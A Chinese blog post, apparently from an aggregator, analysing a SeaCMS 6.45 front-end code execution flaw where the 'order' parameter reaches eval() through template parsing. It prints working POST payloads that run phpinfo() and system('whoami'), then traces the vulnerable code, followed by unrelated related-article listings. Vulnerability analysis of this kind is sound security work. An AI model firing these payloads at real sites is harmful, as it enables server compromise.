环境搭建

1、下载安装包

下载地址:

链接:https://pan.baidu.com/s/1uw_VnxnvG4GGEae4TRsGGw

密码:cd48

2、常规安装

漏洞复现

poc1:

http://127.0.0.1/seacms645/search.php

post:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}

poc2:

POST:

searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);//}{end if}&func=system&cmd=whoami

searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);if(1}{end if}&func=system&cmd=whoami

漏洞分析

0x00 代码执行简单流程

0x01 分析

总的来说就是:$order参数没做严格的限制,就将其传入了模板文件中,然后使用eval()执行模板中包含$order的代码,通过闭合拼接语句的方式,插入恶意代码,实现远程命令执行。

首先是从seacms_6.45/search.php入手,这个文件包含了seacms/include/common.php,在common.php中第45-48行,将GET,POST等请求传入的全局变量中的键值对转换成变量,并对其中的值使用addslashes()进行处理:

function _RunMagicQuotes(&$svar)

{

	if(!get_magic_quotes_gpc())

	{

		if( is_array($svar) )

		{

			foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);

		}

		else

		{

			$svar = addslashes($svar);

		}

	}

	return $svar;

}

foreach(Array('_GET','_POST','_COOKIE') as $_request)

{

	foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);

}

在seacms/search.php文件第63行,echoSearchPage()函数中,将$order变量注册成全局变量:

global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;

而在search.php中,执行echoSearchPage()函数之前,没有对$order变量进行处理。在echoSearchPage()函数中,使用$searchtype来选择使用的模板文件:

if(intval($searchtype)==5)

	{

		$searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/cascade.html";

		$typeStr = !empty($tid)?intval($tid).'_':'0_';

		$yearStr = !empty($year)?PinYin($year).'_':'0_';

		$letterStr = !empty($letter)?$letter.'_':'0_';

		$areaStr = !empty($area)?PinYin($area).'_':'0_';

		$orderStr = !empty($order)?$order.'_':'0_';

		$jqStr = !empty($jq)?$jq.'_':'0_';

		$cacheName="parse_cascade_".$typeStr.$yearStr.$letterStr.$areaStr.$orderStr;

		$pSize = getPageSizeOnCache($searchTemplatePath,"cascade","");

	}else

	{

		if($cfg_search_time&&$page==1) checkSearchTimes($cfg_search_time);

		$searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/search.html";

		$cacheName="parse_search_";

		$pSize = getPageSizeOnCache($searchTemplatePath,"search","");

	}

在if语句中可以看到,当$searchtype 的值为5的时候,传入了%order参数,因此这里的$searchtype需要取值5。

下面153行,将模板文件读取到$content变量中:

$content = parseSearchPart($searchTemplatePath);

接着在155-173行替换标签。其中第158行使用$order替换了模板中{searchpage:ordername}标签:

<a href="{searchpage:order-time-link}" {if:"{searchpage:ordername}"=="time"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderhits">最新上映</a>

<a href="{searchpage:order-hit-link}" {if:"{searchpage:ordername}"=="hit"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderaddtime">最近热播</a>

<a href="{searchpage:order-score-link}" {if:"{searchpage:ordername}"=="score"} class="btn btn-success" {else} class="btn btn-default" {end if} id="ordergold">评分最高</a>

接着,在本文件的第212行:

$content=$mainClassObj->parseIf($content);

跟进去,在seacms\include\main.class.php中第3098-3147行中:

function parseIf($content)

{

    if (strpos($content, '{if:') === false) {

        return $content;

    } else {

        $labelRule = buildregx("{if:(.*?)}(.*?){end if}", "is");

        $labelRule2 = "{elseif";

        $labelRule3 = "{else}";

        preg_match_all($labelRule, $content, $iar);

        $arlen = count($iar[0]);

        $elseIfFlag = false;

        for ($m = 0; $m < $arlen; $m++) {

            $strIf = $iar[1][$m];

            $strIf = $this->parseStrIf($strIf);

            $strThen = $iar[2][$m];

            $strThen = $this->parseSubIf($strThen);

            if (strpos($strThen, $labelRule2) === false) {

                if (strpos($strThen, $labelRule3) >= 0) {

                    $elsearray = explode($labelRule3, $strThen);

                    $strThen1 = $elsearray[0];

                    $strElse1 = $elsearray[1];

                    @eval("if(" . $strIf . "){\$ifFlag=true;}else{\$ifFlag=false;}");

                    if ($ifFlag) {

                        $content = str_replace($iar[0][$m], $strThen1, $content);

                    } else {

                        $content = str_replace($iar[0][$m], $strElse1, $content);

                    }

                } else {

                    @eval("if(" . $strIf . ") { \$ifFlag=true;} else{ \$ifFlag=false;}");

                    if ($ifFlag) {

                        $content = str_replace($iar[0][$m], $strThen, $content);

                    } else {

                        $content = str_replace($iar[0][$m], "", $content);

                    }

                }

            } else {

                $elseIfArray = explode($labelRule2, $strThen);

                $elseIfArrayLen = count($elseIfArray);

                $elseIfSubArray = explode($labelRule3, $elseIfArray[$elseIfArrayLen - 1]);

                $resultStr = $elseIfSubArray[1];

                $elseIfArraystr0 = addslashes($elseIfArray[0]);

                @eval("if({$strIf}){\$resultStr=\"{$elseIfArraystr0}\";}");

                for ($elseIfLen = 1; $elseIfLen < $elseIfArrayLen; $elseIfLen++) {

                    $strElseIf = getSubStrByFromAndEnd($elseIfArray[$elseIfLen], ":", "}", "");

                    $strElseIf = $this->parseStrIf($strElseIf);

                    $strElseIfThen = addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen], "}", "", "start"));

                    @eval("if(" . $strElseIf . "){\$resultStr=\"{$strElseIfThen}\";}");

                    @eval("if(" . $strElseIf . "){\$elseIfFlag=true;}else{\$elseIfFlag=false;}");

                    if ($elseIfFlag) {

                        break;

                    }

                }

                $strElseIf0 = getSubStrByFromAndEnd($elseIfSubArray[0], ":", "}", "");

                $strElseIfThen0 = addslashes(getSubStrByFromAndEnd($elseIfSubArray[0], "}", "", "start"));

                if (strpos($strElseIf0, '==') === false && strpos($strElseIf0, '=') > 0) {

                    $strElseIf0 = str_replace('=', '==', $strElseIf0);

                }

                @eval("if(" . $strElseIf0 . "){\$resultStr=\"{$strElseIfThen0}\";\$elseIfFlag=true;}");

                $content = str_replace($iar[0][$m], $resultStr, $content);

            }

        }

        return $content;

    }

}

这段函数主要功能是将输入的参数与正则匹配,之后进入eval()函数执行。

正则:

3102: $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");

3105: preg_match_all($labelRule,$content,$iar);

要想进入到eval(),$content中必须含有{if:字符串,看代码执行流程,在eval()函数中,$strIf就是之前preg_match_all()中第一个(.*?)匹配出来的值。

@eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");

在eval()中,要闭合前面的if语句,可以构造1)phpinfo();if(1,又要符合正则{if:(.?)}(.?){end if},再看标签:

<a href="{searchpage:order-time-link}" {if:"{searchpage:ordername}"=="time"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderhits">最新上映</a>

由于$order替换的是{searchpage:ordername},所以,在1)phpinfo();if(1基础上添加:

}{end if}{if:1)phpinfo();if(1}{end if}

漏洞利用的基本流程就是这样,简单来说,就是有个可控的变量没有经过过滤,就被带入了eval()中,导致了代码执行。

参考

https://mengsec.com/2018/08/06/SeaCMS-v6-45%E5%89%8D%E5%8F%B0%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://github.com/SecWiki/CMS-Hunter/tree/master/seacms/SeaCMS%20v6.45%E5%89%8D%E5%8F%B0Getshell%20%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C

seacms_6.4.5 前台任意代码执行漏洞分析的更多相关文章

  1. 干货|CVE-2019-11043: PHP-FPM在Nginx特定配置下任意代码执行漏洞分析

    近期,国外安全研究员Andrew Danau,在参加夺旗赛(CTF: Capture the Flag)期间,偶然发现php-fpm组件处理特定请求时存在缺陷:在特定Nginx配置下,特定构造的请求会 ...

  2. phpcms前台任意代码执行漏洞(php<5.3)

    phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞 /phpsso_server/phpcms/libs/functions/global.fu ...

  3. Discuz! 6.x/7.x 版本 前台任意代码执行漏洞

    一.漏洞原理: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞. include/global.fun ...

  4. WordPress wp-includes/functions.php脚本远程任意代码执行漏洞

    漏洞名称: WordPress wp-includes/functions.php脚本远程任意代码执行漏洞 CNNVD编号: CNNVD-201309-166 发布时间: 2013-09-13 更新时 ...

  5. php 168任意代码执行漏洞之php的Complex (curly) syntax

    今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php?only=1&showHt ...

  6. 20.Ecshop 2.x/3.x SQL注入/任意代码执行漏洞

    Ecshop 2.x/3.x SQL注入/任意代码执行漏洞 影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二 ...

  7. 记一次海洋cms任意代码执行漏洞拿shell(url一句话)

    实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...

  8. 修复Apache Log4j任意代码执行漏洞安全风险通告

    2021年12月10日 0x01漏洞背景 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具.该工具重写了Log4j框架,并且引入了 ...

  9. [转帖]Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626)

    Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626) ADLab2019-03-15共23605人围观 ,发现 4 个不明物体安全报告漏洞 https://www.f ...

随机推荐

  1. 不可错过的java面试博客之java集合篇

    1. List List 是有序的 Collection.Java List 一共三个实现类: 分别是 ArrayList.Vector 和 LinkedList ArrayList ArrayLis ...

  2. 算法——Java实现栈

    栈 定义: 栈是一种先进后出的数据结构,我们把允许插入和删除的一端称为栈顶,另一端称为栈底,不含任何元素的栈称为空栈 栈的java代码实现: 基于数组: import org.junit.jupite ...

  3. java线程池原理解析

    五一假期大雄看了一本<java并发编程艺术>,了解了线程池的基本工作流程,竟然发现线程池工作原理和互联网公司运作模式十分相似. 线程池处理流程 原理解析 互联网公司与线程池的关系 这里用一 ...

  4. java基础篇 之 构造器内部的多态行为

    java基础篇 之 构造器内部的多态行为 ​ 我们来看下下面这段代码: public class Main { public static void main(String[] args) { new ...

  5. request中跟路径有关的api的分析

    最近重在研究struts的源码,其中涉及到了request中的几个api,看了文档后还是觉得不清楚,所以在自己原来的工程中 测试了一下各个api的具体效果.在这里跟大家分享一下. 这是我具体测试的代码 ...

  6. LeetCode--Array--Two sum (Easy)

    1.Two sum (Easy)# Given an array of integers, return indices of the two numbers such that they add u ...

  7. 【Spark】通过Spark实现点击流日志分析

    文章目录 数据大致内容及格式 统计PV(PageViews) 统计UV(Unique Visitor) 求取TopN 数据大致内容及格式 194.237.142.21 - - [18/Sep/2013 ...

  8. 深度剖析西门子PLC的开放式TCP通信

    对于自控或电气工程师来说,西门子PLC是每个人都非常熟悉的一款PLC品牌:而对于上位机开发工程师来说,Socket通信或TCP/IP协议也是必须要掌握的一种通信方式.刚好手头有一款西门子的200Sma ...

  9. DotNet:Socket Server 异步套接字服务端实现

    异步服务器套接字示例 From https://msdn.microsoft.com/zh-cn/library/fx6588te(v=vs.110).aspx 下面的示例程序创建接收来自客户端的连接 ...

  10. Power Query:非常规工资条

    常规工资条为标题.内容.空行,每三行一循环,横向排版.打印.空行填充颜色,方便切割.其中用到函数嵌套,先把table以row转换为list,然后用List.TransformMany生成Table.C ...